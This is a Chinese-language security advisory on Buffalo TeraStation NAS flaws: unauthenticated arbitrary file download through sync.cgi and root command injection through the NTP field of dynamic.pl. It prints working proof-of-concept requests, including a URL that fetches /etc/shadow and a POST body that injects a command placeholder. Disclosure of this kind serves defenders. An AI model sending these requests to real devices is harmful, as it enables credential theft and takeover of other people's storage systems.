发布日期:2013-01-30
更新日期:2013-02-01
受影响系统:
buffalotech TeraStation
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57634
Buffalo TeraStation NAS是集中式存储和备份解决方案。
Buffalo TeraStation TS系列在dynamic.pl的实现上存在NTP命令注入漏洞,已验证的用户可通过root权限在系统上执行任意命令。
<*来源:Andrea Fabrizi (andrea.fabrizi@gmail.com)
链接:http://seclists.org/fulldisclosure/2013/Jan/261?utm_source=twitterfeed&utm_medium=twitter
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1]======== sync.cgi unauthenticated arbitrary file download ========
Requesting an unprotected cgi, it's possible, for an unauthenticated
user, to download any system file, included /etc/shadow, that contains
the password shadows for the application/system users.
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow
Moreover, using the key "all" it's possible to download the entire
/var/log directory:
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all
2]======== dynamic.pl NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.
This is a sample request:
#####################################
POST /dynamic.pl HTTP/1.1
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0
bufaction=setDTSettings&dateMethod=on
&ip=www.google.it%26%26[COMMAND]>/tmp/output
&syncFreq=1d
#####################################
建议:
--------------------------------------------------------------------------------
厂商补丁:
buffalotech
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.buffalotech.com/
(责任编辑:IT) |